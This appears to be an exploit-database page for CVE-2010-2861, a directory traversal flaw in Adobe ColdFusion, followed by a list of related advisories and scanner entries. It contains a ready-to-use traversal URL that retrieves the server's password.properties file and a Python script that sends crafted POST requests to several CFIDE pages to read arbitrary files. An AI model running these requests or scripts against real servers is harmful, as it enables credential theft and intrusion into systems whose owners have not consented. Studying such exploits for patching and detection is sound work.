Lucene search
Unknown1337DAY-ID-13699HistoryAug 14, 2010 - 12:00 a.m.
Adobe ColdFusion Directory Traversal Vulnerability
2010-08-1400:00:00
unknown
0day.today
21
Exploit for multiple platform in category remote exploits
==================================================
Adobe ColdFusion Directory Traversal Vulnerability
==================================================
#
Working GET request courtesy of carnal0wnage:
#
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
#
#!/usr/bin/python
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
# leo 13.08.2010
import sys
import socket
import re
# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm")
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
locale=%%00%s%%00a"""
def main():
if len(sys.argv) != 4:
print "usage: %s <host> <port> <file_path>" % sys.argv[0]
print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
print "if successful, the file will be printed"
return
host = sys.argv[1]
port = sys.argv[2]
path = sys.argv[3]
for f in filenames:
print "------------------------------"
print "trying", f
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
s.send(post % (f, host, len(path) + 14, path))
buf = ""
while 1:
buf_s = s.recv(1024)
if len(buf_s) == 0:
break
buf += buf_s
m = re.search('<title>(.*)</title>', buf, re.S)
if m != None:
title = m.groups(0)[0]
print "title from server in %s:" % f
print "------------------------------"
print m.groups(0)[0]
print "------------------------------"
if __name__ == '__main__':
main()
# 0day.today [2018-02-20] #Related
packetstorm
packetstorm
Adobe ColdFusion - Directory Traversal
2011-03-16 00:00:00
ColdFusion Server Check
2024-09-01 00:00:00
Adobe ColdFusion Directory Traversal
2010-08-17 00:00:00
nvd
nvd
CVE-2010-2861
2010-08-11 18:47:51
CVE-2010-5290
2013-09-20 16:55:03
cvelist
cvelist
CVE-2010-2861
2010-08-11 18:00:00
CVE-2010-5290
2013-09-20 16:00:00
exploitdb
exploitdb
Adobe ColdFusion - Directory Traversal (Metasploit)
2011-03-16 00:00:00
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
nuclei
nuclei
Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
2021-03-01 04:26:27
prion
prion
Directory traversal
2010-08-11 18:47:00
Design/Logic Flaw
2013-09-20 16:55:00
cve
cve
CVE-2010-2861
2010-08-11 18:47:51
CVE-2010-5290
2013-09-20 16:55:03
metasploit
metasploit
ColdFusion Server Check
2010-09-01 01:57:22
securityvulns
securityvulns
attackerkb
attackerkb
CVE-2010-2861
2010-08-11 00:00:00
checkpoint_advisories
checkpoint_advisories
Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861)
2010-09-05 00:00:00
exploitpack
exploitpack
Adobe ColdFusion - Directory Traversal
2010-08-14 00:00:00
cisa_kev
cisa_kev
Adobe ColdFusion Directory Traversal Vulnerability
2022-03-25 00:00:00
seebug
seebug
Adobe ColdFusion <=8.0 - Directory Traversal Vulnerability (CVE-2010-2861)
2014-07-01 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-30 00:00:00
openvas
openvas
Adobe ColdFusion Directory Traversal Vulnerability (APSB10-18)
2010-09-02 00:00:00
Adobe ColdFusion Directory Traversal Vulnerability
2010-09-02 00:00:00
zdt
zdt
Adobe ColdFusion - Directory Traversal
2011-03-17 00:00:00
nessus
nessus
Adobe ColdFusion 'locale' Parameter Directory Traversal
2010-08-16 00:00:00
canvas
canvas
Immunity Canvas: CF_DIRECTORY_TRAVERSAL
2010-08-11 18:47:00
thn
thn
Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug
2021-09-21 12:27:00
threatpost
threatpost
12 New Flaws Used in Ransomware Attacks in Q3
2021-11-09 18:06:33
nmap
nmap
http-vuln-cve2010-2861 NSE Script
2012-02-19 14:40:01
Related for 1337DAY-ID-13699